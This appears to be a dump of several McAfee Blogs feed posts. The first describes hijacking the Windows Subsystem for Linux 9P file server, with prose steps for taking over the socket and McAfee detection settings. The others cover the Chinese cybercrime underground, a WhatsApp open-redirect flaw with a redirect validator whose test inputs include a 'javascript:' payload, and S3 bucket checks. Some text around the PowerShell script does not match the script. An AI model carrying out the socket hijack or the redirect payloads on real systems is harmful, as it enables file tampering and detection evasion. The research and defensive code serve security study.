McAfee Blogs: Securing Tomorrow. Today. (https://www.mcafee.com/blogs)

Knock, Knock – Who’s There?
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/knock-knock-whos-there/
Tue, 11 Feb 2020 15:40:35 +0000


A Windows Linux Subsystem Interop Analysis

Following our research on Evil Twins and the Windows Linux Subsystem, interoperability between the different WSL versions caught our attention. The protocol and mechanism used to manage files to and from WSL is a must-know for Blue and Red Teams, whose research will provide new ways to execute known techniques to achieve tactics such as Persistence, Defense Evasion and Execution, among others.

It is important (even if it is not seen today in regular arsenals) to understand how to protect against, detect and react to this attack surface, which could become widespread in a future where WSL is a de facto component of every enterprise machine.

Since Windows 10 version 1903, it is possible to access Linux files from Windows through the \\wsl$\[DistroName] path syntax, which uses the 9P protocol. During our research we found some design issues in WSLv1 that were propagated to WSLv2, even though the core component differs. The main issue is the lack of security controls on the WSL communication object: any user owning the instance also owns the listening Planet 9 File System server. At first sight this may look obvious, but once you control that communication, different ways of using the data sent back and forth between Windows and the container begin to emerge.

It is important to mention that, when running inside an isolated environment like WSLv2, certain activities that do not cross boundaries may remain hidden from security products, but once an attempt to execute a malicious app on the Windows side is detected, the scanning mechanism provided by MVISION Endpoint and ENS will trigger to protect. MVISION EDR will provide visibility and detection of some of these artifacts. At the end of this article we present the objects to monitor in order to detect such cases in your organization.

Potential usages for Red Teams and Researchers:

  • Persistence by hiding the real content, especially on WSLv2, where the root folder is a VHDX image.
  • Protocol fuzzing to discover vulnerabilities in the implementation.
  • Security bypass by using the \\wsl$ syntax in applications that offer an option to disable Network Folders scanning and therefore do not treat this as a local path (McAfee MVISION Endpoint does consider this special path).
  • File tampering (the user accesses a file expecting some content, but it is changed during the transfer).

P9 Server Hijack Pre-Requisites:

  • WSL enabled
  • The same user privileges as the WSL instance
  • A P9-compatible server

In the following sections, P9 (Planet 9 File System Protocol) and 9P (the protocol) are used interchangeably.

WSLv1 and P9

The communication is done through an AF_UNIX socket (a local file) that is owned by the user executing the WSL instance. The socket is created by WSL’s custom init process. Processes on the Windows side use the P9 driver to access that socket through an implementation of the P9 file system, instead of accessing the files as “Windows local” files.

Note: Plan 9 has several implementations; currently the format supported by Windows is L / W.

Running strings on init shows that:

  1. The first WSL instance opens the P9 server for that distribution.
  2. Init has an embedded server that creates a Unix socket in the distro path.
  3. That Unix socket is used for the communication.
  4. Whenever \\wsl$\ is accessed, the P9 driver starts the communication.
  5. A P9 client talks to the server.

Now, is that fsserver file protected? No! That means we can hijack that socket and start our own P9 server (in this case I used DIOD as the main source), and from there the options are endless: from protocol fuzzers that trigger something unexpected, to protection bypass, to something very simple that just serves different content than expected.

To find programmatically the fsserver root location using PowerShell:
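An added example (not the post’s own script) that enumerates the distributions registered under the Lxss registry key, reports where each one’s fsserver socket should be, whether it is present and who owns it, and optionally watches for the deletion that the Active Response file trigger in the detection section keys on. The rootfs\fsserver location under each distribution’s BasePath is an assumption.

```powershell
# Added example (not the post's own script): locate each WSL distribution's root,
# check its fsserver socket and, optionally, watch for the socket being deleted.
# Assumption: WSLv1's init creates the socket as <BasePath>\rootfs\fsserver.
$LxssKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss'

function Get-WslFsServer {
    # Each distribution is a GUID-named subkey under Lxss carrying the
    # DistributionName, BasePath and Version values.
    Get-ChildItem -Path $LxssKey -ErrorAction SilentlyContinue | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath
        if (-not $props.DistributionName) { return }
        # Newer builds store BasePath with a \\?\ prefix; strip it so Test-Path works.
        $base   = $props.BasePath -replace '^\\\\\?\\', ''
        $socket = Join-Path $base 'rootfs\fsserver'
        $exists = Test-Path -LiteralPath $socket
        # Owner of the socket file: per the post, the user running the instance.
        $owner  = if ($exists) { (Get-Acl -LiteralPath $socket).Owner } else { $null }
        [pscustomobject]@{
            Distribution = $props.DistributionName
            Version      = $props.Version
            FsServer     = $socket
            Present      = $exists
            Owner        = $owner
        }
    }
}

function Watch-WslFsServer {
    # Raise a warning when fsserver disappears: the same condition the Active
    # Response file trigger described in the detection section is built on.
    param([Parameter(Mandatory)][string]$SocketPath)
    $dir  = Split-Path -Parent $SocketPath
    $name = Split-Path -Leaf $SocketPath
    $watcher = New-Object System.IO.FileSystemWatcher -ArgumentList $dir, $name
    $watcher.EnableRaisingEvents = $true
    Register-ObjectEvent -InputObject $watcher -EventName Deleted `
        -SourceIdentifier "WslFsServer:$SocketPath" `
        -Action {
            Write-Warning ("{0} fsserver deleted: {1}" -f (Get-Date -Format o),
                           $Event.SourceEventArgs.FullPath)
        } | Out-Null
}

# Inventory every registered distribution; WSLv1 (Version 1) entries are the ones
# that expose an fsserver socket on the Windows file system.
$inventory = Get-WslFsServer
$inventory | Format-Table -AutoSize

# Watch the sockets that currently exist for deletion.
$inventory | Where-Object Present | ForEach-Object { Watch-WslFsServer -SocketPath $_.FsServer }
```

Run it from the same user account that owns the WSL instance; a registered distribution whose socket is reported absent while the instance is running, or whose owner is not the expected user, is worth investigating.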

From there, the next step would be to start our P9 server from WSL (assuming the path was provided as the script argument, as shown above):

In this example, next time we access \\wsl$\Debian, it will serve the files from mynewroot.

The below screenshot shows the full procedure using a modified P9 server:

  1. DIOD listening on the local socket.
  2. WSL directory listing before the hijack.
  3. WSL directory listing after the hijack.

At the time we were working on this, WSLv2 was announced and made available in the latest Windows 10 update. The next question was obvious: can we still do the same, given that the instance now runs a real kernel, since it is hosted as an internal Hyper-V instance?

WSLv2 and P9

Now that there is a real Linux kernel, the kernel’s own “p9 Linux” module is in use. The C: drive is mounted using P9 on top of drvfs, with several rdfd/wdfd arguments.

The host is at CID 2, and ports 50000, 50001 and 50002 are used for interop messages and instance control.

Back to work: there are some steps to follow to determine whether we can achieve the same P9 server hijack or not.

  • Scan the open ports listening on the WSLv2 instance (a starting point could be modifying the sample client code to become a scanner).
    1. Find the instance UID (one option is to check Task Manager and the wslhost.exe command line).
    2. Scan the instance!
    3. Hey! Port 0x405 (1029 decimal) is open; let us knock-knock to find out who is there.
  • P9 server port found… let us go hijack!!!
    1. Listening on the same port as with WSLv1 is not possible, unless we find a way to bypass the restrictions (the app/module is not using reuseaddr/port, the port cannot be closed from user space, etc.).
    2. We cannot kill init nor unload the module serving the files, so our best bet would be to close the port from the kernel. At the end of the day, it is our instance and we log in as root.
    3. Let us create a vsock module that will:
      1. List the currently connected vsock sockets.
      2. Close a socket listening on a certain port.
    4. Compile the module using the kernel source.
    5. Test it! (Note that some ports are not shown and this should be fixed, but for what we want the output is enough.)
    6. Now we are free to go, but we still need to start our P9 DIOD server listening on that port using a VSOCK socket. Since socat supports this type of socket, it will be a piece of cake.
  • Access \\wsl$\DistributionName and voilà!

Protection and Detection with McAfee Products

In addition to the rules related to WSL presented in previous posts, McAfee products provide several ways to detect and protect against P9 hijacking:

  • MVISION Endpoint will scan \\wsl$\ even if network scanning is disabled, so from the execution perspective on the Windows side protection will still apply.
  • By using Endpoint Security Expert Rules it is possible to block execution from WSL paths.
  • To configure Active Response (WSLv1), follow the steps below:
    • Set up a trigger to be notified of this situation, i.e. when the fsserver file is deleted:
      • File trigger with condition: “Files name equals fsserver”
    • Files collector, if enabled, looking for fsserver modifications:
      • “Files where Files name equals fsserver”

In MVISION EDR (WSLv1), the file collector should be enabled and looking for wsl.conf modifications (files where files name equals “fsserver”).

As a final note, we expect this post to provide new insights for the future exploration of these key areas, especially considering that WSLv1 and WSLv2 instances can be converted online and both versions will remain in use over the next years.

References:

  1. http://doc.cat-v.org/plan_9/misc/ubiquitous_fileserver/
  2. http://9p.io/magic/man2html/5/intro
  3. https://github.com/chaos/diod/blob/master/protocol.md
  4. https://w4mhi.wordpress.com/complete-hyper-v-socket-client-code/
  5. https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service
  6. https://tyranidslair.blogspot.com/2019/07/digging-into-wsl-p9-file-system.html
  7. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/
  8. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/the-twin-journey-part-1/

How Chinese Cybercriminals Use Business Playbook to Revamp Underground
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-chinese-cybercriminals-use-business-playbook-to-revamp-underground/
Tue, 11 Feb 2020 05:01:33 +0000


Preface

Because of its longevity and technical sophistication, the Russian cybercriminal underground has long been the benchmark for threat researchers focused on studying cybercrime tactics and techniques; there is a plethora of publications dedicated to analyzing its economy and hacking forums. However, only a handful of studies have centered on the emerging threats and trends from other, less prominent, cybercriminal undergrounds.

Recent data shows that the Chinese cybercriminal underground’s profits exceeded US$15.1 billion in 2017, while causing more than $13.3 billion worth of damage relating to data loss, identity theft and fraud. Over the years, the McAfee Advanced Programs Group (APG) has observed Chinese non-state threat actor groups gradually transform from small local networks targeting mostly Chinese businesses and citizens to large, well-organized criminal groups capable of hacking international organizations.

The development of commercial-scale exploit toolkits and criminal networks that focus on monetizing malware has amplified the growing risks of cybercrime in the Asia Pacific region, as shown by a DDoS attack against the People’s Bank of China in December 2013, a $1 billion SWIFT hack against Bangladesh Bank in February 2016 and a $60 million theft from Far Eastern International Bank in Taiwan in October 2017, to name just a few.

This blog provides a rare glimpse inside the Chinese cybercriminal underground. Analyzing its current business models and techniques has yielded insights into the drastic changes in its operations, including the tactics and strategies it is borrowing from Russian cybercriminals.

Timeline: The Rise of the Chinese Cybercriminal Underground

China established its first cable connection to the world wide web in 1994, around the same time as cybercrime syndicates from Russia and other emerging cybercriminal undergrounds were executing their first major cybercrimes. Chinese leaders have since prioritized the development and acceleration of Internet technologies and, today, the size of China’s Internet use is massive and unparalleled at 800 million users.

However, this growth in Internet usage is not without irony as it has been accompanied by a significant increase in cybercriminal activity. Despite the Chinese government placing high importance on running one of the world’s most sophisticated Internet censorship systems, local cybercriminals are finding workarounds that contribute to China having one of the fastest growing cybercriminal underground economies.

China’s cybercrime enterprise is large, lucrative and expanding quickly. According to 2018 Internet Development Statistics, China’s cybercriminal underground was worth more than US $15 billion, nearly twice the size of its information security industry. The same Chinese-language source also shows that China’s cybercrime is growing at a rate of more than 30 percent a year. An estimated 400,000 people work in underground cybercriminal networks.

Changes in Tactics, Techniques and Procedures

In order to quickly scale up their businesses and maximize return on investment (ROI), Chinese cybercriminals have continuously adapted their tactics, techniques and procedures (TTPs). One significant change is that Chinese cybercriminals are slowly moving away from a high degree of one-to-one engagement through China’s popular QQ instant messaging platform to establishing more formal cybercriminal networks. These networks use centralized advertising and standard service processes similar to Russian and other more sophisticated cybercriminal underground forums. Cybercriminals can access these centralized networks, hosted on the deep web, to post their products and services. A large amount of stolen data is available via automated services, where carders can order the credit and debit card information they want without having to interact with another user. With regard to hacking services, Chinese cybercriminals also offer forms for prospective clients to fill out their service requests, including types of attacks, target IP addresses, desired malware or exploit toolkits and online payment processing. By establishing a standardized model of sale, Chinese cybercriminals can expand their activity quickly without incurring additional overhead costs.

Attacks-as-a-service

Similar to other prominent cybercrime underworlds, Chinese cybercriminal underground markets are focused on providing excellent customer service. Many of the hackers expand their working hours to include weekends and even provide 24/7 technical support for customers who do not have a technical background. Distributed Denial of Service (DDoS) botnets, traffic sales, source code writing services, email/SMS spam and flooding services are available on the Chinese black markets.

Despite government censorship, a small number of Chinese cybercriminals still use dark web marketplaces to offer their services and products. Those marketplaces typically specialize in the commercialization of stolen personally identifiable information (PII), bank accounts with high balances, hacking services and malware customization. However, these darknet markets and hacking forums are not easily accessible because the Chinese government blocks the Tor anonymity network. A large number of Chinese cybercriminals continue to use exclusive and opaque QQ groups, Weibo fora and Baidu Tieba for advertising and communication. Chinese cybercriminals are also active on the clearnet. To avoid government censors and crackdowns, Chinese cybercriminals extensively use slang or other linguistic tactics for communication and advertising, which can be difficult for outsiders to comprehend. For instance, Chinese cybercriminals call a compromised computer or server “chicken meat.” Stolen bank accounts, credit card passwords or other hijacked accounts are referred to as either “letters” or “envelopes.” Malicious websites and email accounts used for credential phishing attacks or spamming are referred to as “boxes.” Stolen information or details stored on the magnetic stripe on the back of a bank card are referred to as “data”, “track material” or simply “material.”

Moving Operational Base Abroad

Another noticeable trend is that an increasing number of Chinese cybercriminal gangs are moving their operational base abroad, using cryptocurrencies to launder money. They appear to prefer countries and jurisdictions with weak cybercrime legislation or weak enforcement, such as Malaysia, Indonesia, Cambodia and the Philippines. Since 2017, China’s Ministry of Public Security has uncovered over 5,000 cases of cross-border telecommunication fraud involving more than US $150 million. Some of the cybercriminal groups are highly structured and work as traditional mafia-like groups that engage delinquent IT professionals; some Chinese cybercrime gangs are well-structured with clear divisions of labor and multiple supply chains. Members are typically located in close geographic proximity, even when the attacks are transnational.

Unique Culture and Practices

Chinese hackers employ different payment methods, recruiting strategies, and operating structures from other cybercriminal undergrounds. AliPay and bank transfers are the generally accepted payment methods advertised by Chinese-language hacking forums; many other forums typically prefer Monero and Bitcoin.

The “Master-Apprentice Mechanism,” which is a form of mentorship, plays a significant role in the Chinese hacking communities. Many Chinese hacker groups use the strategy to recruit new members or make profits. As shown in the following graph, QQ hacking group masters, usually masterminds of an organized crime group or administrators of a hacking community, collect training fees from the members they recruit. These members, known as “apprentices” or “hackers-in-training”, are required to participate in multiple criminal “missions” before they complete the training programs. Once training is complete, they are eligible to upgrade to full-time hackers working for their masters and responsible for downstream operations, such as targeted attacks, website hacking and database exfiltration.

Figure 2: Master-Apprentice Mechanism (Source: Author)

Growth of Chinese Cybercrime

The Chinese cybercriminal underground has gone through drastic changes over the years. It gradually transformed from small local networks, targeting mostly Chinese businesses or citizens, to larger and well-organized criminal groups capable of hacking international organizations. My research indicates that there has been a growing threat activity targeting individuals and organizations in South Korea, Taiwan, Singapore, Germany, Canada and the United States. Chinese cybercriminals offer a wide variety of goods and services, ranging from physical counterfeit of US and Canadian driver’s licenses, scans of counterfeit US and Canadian driver’s licenses, US cell phone numbers, credit cards and identification cards to stolen social media and email accounts.

Figure 3: Growth of Chinese cybercrime (Source: Author)

As shown in the following screenshots, 1 million stolen US email accounts with encrypted passwords are selling for US $117; 1.9 million stolen German email accounts with clear-text passwords are available on the Chinese black market for US $400. Counterfeits or scans of US or Canadian passports or driver’s licenses are also for sale for as little as US $13.

Figure 4: 1 million US email accounts with encrypted passwords are for sale in the Chinese cybercriminal underground
Figure 5: 1.9 million stolen German email accounts with clear text passwords are for sale in the Chinese cybercriminal underground
Figure 6: Chinese cybercriminals sell physical counterfeit of Canadian driver’s licenses

As shown in the following screenshots, Chinese hackers are also selling stolen personal data, including identification cards and passports of Taiwanese and South Korean citizens.

Figure 7: Stolen PII from Taiwanese citizens, including national identification numbers, physical addresses, cell phone numbers, etc. are for sale in the Chinese cybercriminal underground
Figure 8: Chinese hackers selling 17 million South Korean national identification numbers

Login credentials for banks around the world are available on the Chinese cybercriminal underground market, and the higher the available balance of an account, the higher its selling price. Packages of hacked accounts from major US social media companies and networking platforms, gaming service providers, as well as media service providers are sold for as little as US $29 in the underground cybercrime market. These social media accounts are sometimes hacked with the intention of using them as a way to generate fake accounts to ensnare even more web users. A large number of email accounts from Taiwanese (i.e., @yahoo.com.tw) and South Korean email service providers (i.e., @nate.com, @yahoo.com.kr) are being sold on the Chinese black market.

Increasingly Difficult to Separate Cybercrime From Cyberespionage Activity

As the Chinese cybercriminal underground quickly expands its scope and sophistication, it is increasingly difficult to separate cybercrime from cyber espionage activity. This is especially true as I observe that Chinese cybercriminals offer services to spy on businesses and sell commodities that can be used to target businesses or government officials for economic and political espionage purposes. One of the most interesting items I found for sale in the Chinese cybercriminal underground is a full business dossier on Chinese companies and government agencies. Some Chinese hackers sell internal employee directories from high-profile technology companies. Chinese cybercriminals appear to work with malicious insiders or hire hackers to work as undercover agents inside of telecommunications service providers, financial services and technology companies to steal company secrets or other proprietary information. Documents include detailed contact information of CEOs and senior management from China’s top 50 companies. Other business proprietary information, such as credentials associated with a company’s various bank accounts, funding history, marketing strategies, and Tax Identification Number (TIN) are also available for sale on the black market. Malicious actors can use the above-mentioned information to launch targeted attacks against a business or leverage third-party vulnerabilities, such as trusted financial services, staffing firms and IT service providers to infiltrate a target system.

Conclusion

China’s cybercrime networks are rapidly growing in scope and sophistication. Compared to my earlier research paper on China’s cybercriminal underground from three years ago, Chinese cybercriminals have begun to embrace a sophisticated business-model approach and develop complex hierarchies, partnerships and collaboration with cybercriminal groups at home and internationally. These globally operating and organized cybercrime networks are basing themselves in countries with weak legal systems and law enforcement, while taking full advantage of global Internet connectivity to attack targets worldwide. A growing number of Chinese cybercriminals from these networks leverage the deep web to host their infrastructure and sell illegal goods and services, instead of relying on traditional peer-to-peer engagement through the QQ platform. To accelerate profitability, the Chinese hacking community has adopted tactics and techniques similar to Russian and other prominent cybercriminal underground markets to become more structured and service-oriented. In contrast, the Russian cybercriminal networks have been known for a multi-faceted criminal organizational structure specialized in monetizing PII theft and financial fraud, whereas China’s cybercriminal underground has placed greater emphasis on community and discipleship in achieving financial gains. Many of China’s cybercriminal networks incorporate this discipleship, also known as the “master-apprentice mechanism”, into a recruiting strategy that is largely different from that of their Russian counterparts. As China’s cybercrime continues to evolve and advance, international organizations operating in the Asia Pacific region are facing an expanding threat landscape from cybercriminal activity targeting high-value business assets. Intellectual property and identity theft can also cause substantial economic consequences.

Intelligence in the Enterprise
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/intelligence-in-the-enterprise/
Tue, 11 Feb 2020 05:01:13 +0000


Intelligence became an integral military discipline centuries ago. More recently, this practice evolved into what is called Intelligence Preparation of the Battlefield, or IPB. In both military and civilian agencies, the discipline uses information collection followed by analysis to provide guidance and direction to operators making tactical or organizational decisions. Used strategically, this type of intelligence puts an organization in a stronger position to operate offensively or defensively because, in theory, it now knows more than its enemy.

This same concept can be applied in the theater of cybersecurity operations. However, the current scope of intelligence in many enterprises describes just one aspect of the IPB discipline: information collection. The critical component missing to complete the process is a specialized researcher trained in this type of analysis and subsequent application of intelligence.

A disciplined intelligence cycle goes deep, applying advanced data collection methodologies from open, closed and proprietary sources, social media, human intelligence and the dark web against areas such as cybercrime, hacktivism or cyber espionage to thoroughly analyze the adversary. Intelligence can ultimately be used to prepare organizations tactically and strategically to both anticipate and mitigate modern threats.

The latest research and analysis from McAfee Advanced Program Group (APG) researcher Anne An detailing the actions of Chinese non-state threat actor groups is a great example of intelligence that is invaluable for organizations. This unique take on Chinese cyber criminality educates practitioners on the threats around them, empowering them to prepare their organization to be proactive, rather than reactive. Further, there are many times where organizations are unaware they have been a victim of a cyberattack. This could include stolen data, which McAfee APG may find being sold on the dark markets, and in some cases, could have a devastating effect on their business.

Sun Tzu, the Chinese general and military strategist, once articulated: “The art of war teaches us to rely not on the likelihood of the enemy’s not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.” These ancient words are still very meaningful today. If organizations robustly embrace the intelligence process, their defensive posture will improve dramatically.

Safer Internet Day 2020
https://www.mcafee.com/blogs/consumer/safer-internet-day-2020/
Mon, 10 Feb 2020 23:40:44 +0000


What Can You Do To Make The Internet a Better Place

In 2020, you’d be hard-pressed to find an Aussie teen who doesn’t spend a fair whack of their time online. And while many of us parents don’t always love the time our offspring spend glued to screens, most of us have come to accept that the online world is a big part of our kids’ lives.

So, let’s accept that the internet is going to be a feature of our kids’ lives and work out how best we can keep them safe.

Together For A Better Internet

Today is Safer Internet Day, an international annual event that encourages us all to work together for a better internet. It is the perfect opportunity to find out what we can do as parents to ensure our kids are as safe as possible online.

Organised by the joint Insafe/INHOPE network, with the support of the European Commission, Safer Internet Day is held each February to promote the safe and positive use of digital technology, especially among children and young people. Safer Internet Day is all about inspiring users to make positive changes online, to raise awareness of online safety issues, and participate in events and activities right across the globe.

What Can We Do As Parents?

As role models and life-educators, parents play an enormous role in shaping our kids’ behaviours and opinions – particularly before they get to the teenage years!! So, why not use Safer Internet Day as a prompt to freshen up your cybersafety chats with your brood.

Not sure where to start? Here are my top messages to weave into your chats with your kids:

  1. Be Kind Online

Spread love, not hate, online. A better internet includes building an online culture where people share positive and encouraging posts and comments. It may be as simple as posting a positive message, liking a post that is encouraging or sharing an inspiring article.

It may sound obvious but before you post a comment or a tweet, ask yourself whether the message could offend someone or impact them negatively. And remember to NEVER like, favourite, retweet, post or comment negatively online.

  2. Learn How To Disagree Respectfully Online

No matter how much we try, there will always be some people online who get a kick out of being unkind. If you come across this behaviour, I encourage you to call it out and report it but ALWAYS do so in a respectful fashion. Reciprocating with harsh words or name-calling will only further inflame a toxic situation. A logical, factual response that is respectful will always triumph!

  3. Protecting Your Online Reputation (& Others Too)

If you’re planning on hiring someone or even going on a date with someone, the chances are you’re going to ‘Google’ them first. And what you find online and the opinion you form decides whether the person’s digital reputation is acceptable or not.

So, it’s essential to remember that everything you post online is permanent and public; not to post inappropriate comments or pics of yourself or others; to ensure all your online profiles are set to private to avoid strangers ‘screen-grabbing’ your private info and photos; not to respond to inappropriate requests; and, most importantly, to take a breather when things are getting heated online, as you may otherwise regret your comments and actions.

  4. Passwords!!!!!

Managing passwords is one of the best ways of taking control of your online life and creating a better internet. Ensuring you have a separate password for every online account means that if you are affected by a data breach, your other online accounts are not at risk. Always choose passwords that have letters, numbers and symbols and ensure they are complex and not obvious. I love using a nonsensical sentence! And if all that’s too hard, why not consider a password manager that not only creates complex passwords for each of your online accounts but remembers them too. All you need to do is remember the master password! Awesome!!

So, why not pledge to change up your cybersafety chats with your kids this Safer Internet Day? And remember – they are watching you too! So, ensure you always model online respect, take your online responsibilities seriously and manage your passwords carefully. Because every little step is a step towards a positive change.

The post Safer Internet Day 2020 appeared first on McAfee Blogs.

]]>
WhatsApp Users: Secure Your Desktop With These Tips https://www.mcafee.com/blogs/consumer/consumer-threat-notices/whatsapp-desktop-vulnerabilities/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/whatsapp-desktop-vulnerabilities/#respond Mon, 10 Feb 2020 22:46:07 +0000 /blogs/?p=98529


]]>

With over 500 million daily active users, WhatsApp is one of the world’s most popular messaging platforms. In an effort to provide even more ways to connect beyond iOS and Android, WhatsApp introduced a desktop version of the app in 2016, which allowed users to stay in touch from their home or work computer. However, a researcher from The Hacker News recently disclosed multiple vulnerabilities in WhatsApp which, if exploited, could allow remote attackers to compromise the security of billions of users.

How safe is WhatsApp?

According to researcher Gal Weizman, the flaws were found in WhatsApp Web, the browser version of the messaging platform. Weizman revealed that WhatsApp Web was vulnerable to an open-redirect flaw, which allows remote hackers to redirect victims to suspicious, arbitrary websites. If a hacker sent an unsuspecting victim a message containing one of these arbitrary links, they could then trigger cross-site scripting attacks. These attacks are often found in web applications and can be used by hackers to bypass access controls by injecting malicious code into trusted websites.


If the victim clicks on the link in the message, the hacker could remotely gain access to all the files from their Windows or Mac computer, which increases the risk for identity theft. What’s more, the open-redirect flaw could have also been used to manipulate previews of the domain WhatsApp displays when links are sent through their platform. This provides hackers with another avenue to trick users into falling for phishing attacks.
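The open-redirect flaw described above comes down to a web application honouring a user-supplied redirect target without checking it. The snippet below is an added example written for this post, not code from WhatsApp or from the researcher; the allowlisted hostnames and the sample URLs are constructed. It shows the vulnerable pattern beside a hardened check that only allows same-site or allowlisted targets and rejects the parsing tricks (protocol-relative `//host`, backslashes, `user@host` userinfo, non-HTTP schemes) that commonly slip past naive string checks.

```python
"""Open-redirect check: vulnerable pattern beside a hardened one.

Added example (not WhatsApp's code). ALLOWED_HOSTS and the sample URLs
are constructed for illustration.
"""
from urllib.parse import urlsplit, urlunsplit

# Constructed allowlist: the only hosts a "next"/"redirect" parameter may
# send a user to. A real deployment would list its own origins.
ALLOWED_HOSTS = {"app.example.com", "help.example.com"}


def redirect_target_unsafe(user_supplied: str) -> str:
    """Vulnerable form: the parameter is used as-is, so a link such as
    ?next=https://evil.test sends the user off-site under a trusted URL."""
    return user_supplied


def redirect_target_safe(user_supplied: str) -> str:
    """Hardened form: allow only http(s) targets on allowlisted hosts or
    single-slash relative paths; everything else falls back to '/'."""
    target = user_supplied.strip()
    # Browsers treat a backslash like a slash, so "/\evil.test" is really
    # "//evil.test" (protocol-relative, off-site). Normalise before parsing.
    target = target.replace("\\", "/")
    parts = urlsplit(target)

    # Non-HTTP schemes ("javascript:", "data:") are never valid targets.
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return "/"

    if parts.netloc:
        # .hostname drops userinfo and port, so "https://app.example.com@evil.test"
        # yields "evil.test", which is not on the allowlist.
        host = parts.hostname or ""
        if host not in ALLOWED_HOSTS:
            return "/"
        # Rebuild from validated parts only: userinfo, port and fragment
        # supplied in the original string are discarded.
        scheme = parts.scheme.lower() or "https"
        return urlunsplit((scheme, host, parts.path or "/", parts.query, ""))

    # Relative target: "//evil.test" has a netloc and was handled above;
    # "https:evil.test" has a scheme but no leading slash. Require exactly
    # one leading slash.
    if not target.startswith("/") or target.startswith("//"):
        return "/"
    return urlunsplit(("", "", parts.path, parts.query, ""))


if __name__ == "__main__":
    # Constructed inputs: the first two are legitimate, the rest are the
    # shapes that typically get past a naive "starts with /" check.
    for candidate in ("/account?tab=1",
                      "https://help.example.com/faq",
                      "https://evil.test/",
                      "//evil.test/",
                      "/\\evil.test",
                      "https://app.example.com@evil.test/x",
                      "javascript:alert(1)"):
        print(f"{candidate!r:45} -> {redirect_target_safe(candidate)}")
```

The hardened function never passes the raw parameter through: the final URL is rebuilt from parsed, validated components, so anything encoded into the original string that the parser did not recognise as a permitted part is dropped rather than forwarded.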

 

How to stay safe

How can users continue to use messaging platforms like WhatsApp without putting themselves at risk of an attack? Follow these security tips for greater peace of mind:

  • Update, update, update. If you’re a WhatsApp Web user, be sure to update to the latest version to install the security patch for this flaw.
  • Think before you click. Be skeptical of ads shared on social media sites and messages sent to you through platforms like Facebook, Twitter, and WhatsApp. If you receive a suspicious message from an unknown sender, it’s best to avoid interacting with the message.
  • Hover over links to see and verify the URL. If someone you don’t know sends you a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post WhatsApp Users: Secure Your Desktop With These Tips appeared first on McAfee Blogs.

]]>
Cloud Security is like Renting a Car! https://www.mcafee.com/blogs/enterprise/cloud-security/cloud-security-is-like-renting-a-car/ https://www.mcafee.com/blogs/enterprise/cloud-security/cloud-security-is-like-renting-a-car/#respond Mon, 10 Feb 2020 15:35:25 +0000 /blogs/?p=98497


]]>

Cloud security has many aspects, and it is easy to miss the scale of the issue by taking a simple view. For example, some people trust a particular cloud service provider and assume that all security responsibility belongs to the provider; some look only at the technical aspects (is data encrypted?) or certifications (do they conform to ISO 27xxx?); and some forget the human aspect. Sadly, any of these viewpoints can mean insecure cloud use and data loss for the company.

To explain the breadth of securing cloud, we have created a new white paper “The Cloud Security 360° Shared Responsibility Model” that splits cloud security requirements into nine areas and discusses how to ensure each different area is being addressed.

In other areas of life, we also have a shared responsibility, even if it is usually seamless and so we don’t think about it much, for example when renting a car.

Firstly, when the car is new, the manufacturer is responsible for making sure it is roadworthy: it has good brakes and tires, the airbags work, and it’s not going to fall apart at the first corner. During the car’s lifetime, the rental company and the renter are hopefully not going to test the airbags; they just assume that the airbags will work as originally installed.

Once the car gets older, the owner (the rental company) is responsible for checking the tires and the brakes, servicing the car and keeping it roadworthy; the renter simply assumes that this is the case. The renter needs to have the appropriate driving license for the vehicle, and this is checked by the rental company before the car is handed over.

The car includes seat belts, installed by the manufacturer, but it is the driver’s responsibility to wear their own, and ensure that all the family members wear them too. For young children, it is the driver’s responsibility to ensure that they have appropriate child seats and for the older kids, the parent has to ensure that they do not take off their seat belt.

General insurance is shared between the rental company and the renter (who, perhaps isn’t the only driver). Ultimately, the driver is responsible for driving the car appropriately for the conditions, driving more slowly in rain and snow and not speeding around corners.

Renting a car safely is a responsibility where five groups of people all have their part to play: car manufacturer, rental company, renter, passengers and the driver.  If one area is ignored, there could be an accident with tragic consequences, and it is no good saying “but I checked the other areas” – all need to be considered together.

Cloud computing is similar – you are not safe just because the cloud service provider has invested a lot in security. You are not safe just because you have anti-malware systems installed. The service provider, enterprise, IT security team and user all have a part to play, and if any one of the areas is not addressed, then security is compromised.

Cloud computing needs to be considered across each row of the diagram. The cloud service provider is responsible for the lowest levels of security (power, connectivity, server infrastructure etc.) and provides some security functions, but the enterprise is responsible for turning these on (think of the number of data loss incidents caused by misconfigured S3 buckets). Only the enterprise can truly decide which data is confidential, while it is users who typically decide to share and collaborate via the cloud with external parties.

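To make the S3 point concrete: the provider offers the controls, but the bucket owner has to set them. The script below is an added example written for this post, not something from the white paper or from AWS; the bucket policy, ACL and Block Public Access settings are constructed in the shapes the S3 API returns them, and the account ID, role name and bucket name are placeholders. It flags a world-readable policy statement, a public ACL grant and a disabled Block Public Access configuration, and shows the corrected settings beside the weak ones.

```python
"""Offline check of the bucket-side S3 settings the enterprise owns.

Added example (not from the McAfee paper or AWS). All inputs are
constructed; the account ID, role and bucket name are placeholders.
"""
import json

# Grantee URIs S3 uses for "everyone" and "any AWS account" in bucket ACLs.
PUBLIC_ACL_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def _principal_is_public(principal) -> bool:
    """Policy Principal may be "*", {"AWS": "*"} or {"AWS": [..., "*"]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        aws = [aws] if isinstance(aws, str) else aws
        return "*" in aws
    return False


def public_policy_statements(policy: dict) -> list:
    """Return the Sids of Allow statements open to any principal.
    Statements carrying a Condition are reported as well: a condition such
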